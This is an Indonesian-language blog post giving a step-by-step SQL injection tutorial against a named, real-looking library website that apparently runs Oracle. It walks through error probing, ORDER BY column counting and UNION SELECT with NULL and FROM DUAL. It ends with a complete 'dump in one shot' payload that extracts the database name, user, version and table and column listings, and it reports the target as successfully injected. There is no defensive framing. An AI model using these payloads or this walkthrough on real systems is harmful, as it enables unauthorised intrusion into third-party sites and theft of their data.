Beranda  ›  SQL INJECTION ORACLE

SQL INJECTION ORACLE

Senin, 24 Januari 2022 Tambah Komentar Edit


Assalamualaikum hallo sobat semua nya balik lagi dengan saya Riski/Jack007 ok di artikel kali ini saya akan bahas tentang "SQL INJECTION ORACLE" ok tanpa Berlama"langsung aja

Target:
>> http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1

Ok kita buka site nya terlebih dahulu 

Nah kalian cek vuln nya dlu beb

Carany? Ksih ' di belakang angka

Contoh

>> http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=-1'



Ok dia error, brarti vuln ya kita kasih url balancer terlebih dahulu
Contoh
>>
http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1'--+-

Loh kok masih eror bang?yaps gak semua website yang vuln SQL suport tanda ' jadi hapus saja 

sekarang kita lanjut ke order by nya


http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 order by 1--+- (normal)

http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 order by 2--+- (normal)

http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 order by 3--+- (normal)

http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 order by 4--+- (eror)

Dan error ny di angka 4

nah lanjut lagi kita ke union select nya


http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 union select 1,2,3--+-

Kok error?

Yap karna type nya oracle, jadi angka togel nya itu, diganti pakai null

jadi:
http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 union select null,null,null --+-
nah kek gitu yah
Kok masih eror bang?

 Karena ini type Oracle jadi kita tambahkan sjaa from dual 

http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=1 union select null,null,null from dual--+-
 
Di depang angka param kalian tambahkan saja - jadi nya
http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=-1 union select null,null,null from dual--+-

Nah normal

trus gimana lagi?nah disini kita tinggal tempel aja dios nya di null awal

>> http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=-1 union select (Dios kalian),null,null from dual--+-
Jadi nya seperti ini

http://interlib.nlb.by/bb/bb/index.php?region_id=6&ministry_id=-1 union select concat('inject By Jack007','<br>'||'DB :: '||SYS.DATABASE_name||'<br>'||'USER :: '||user||'<br>'||'VERSION :: '||(SELECT BANNER from V$version where rownum=1)||'<br>'||'<br>'||(select wm_concat('<li>'||table_name||'='||column_name)from (select rownum as rnum,table_name,column_name from all_tab_columns order by table_name desc) shell where rnum<120))||'<!--',null,null from dual--+-
 


Oke Terinjection 

Sekian dari saya tentang "SQL INJECTION TYPE ORACLE" sampai jumpa di artikel selanjutnya 

Thanks to
>./numb_404
>TnJeryy
>SoNaX717


Belum ada Komentar untuk "SQL INJECTION ORACLE"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel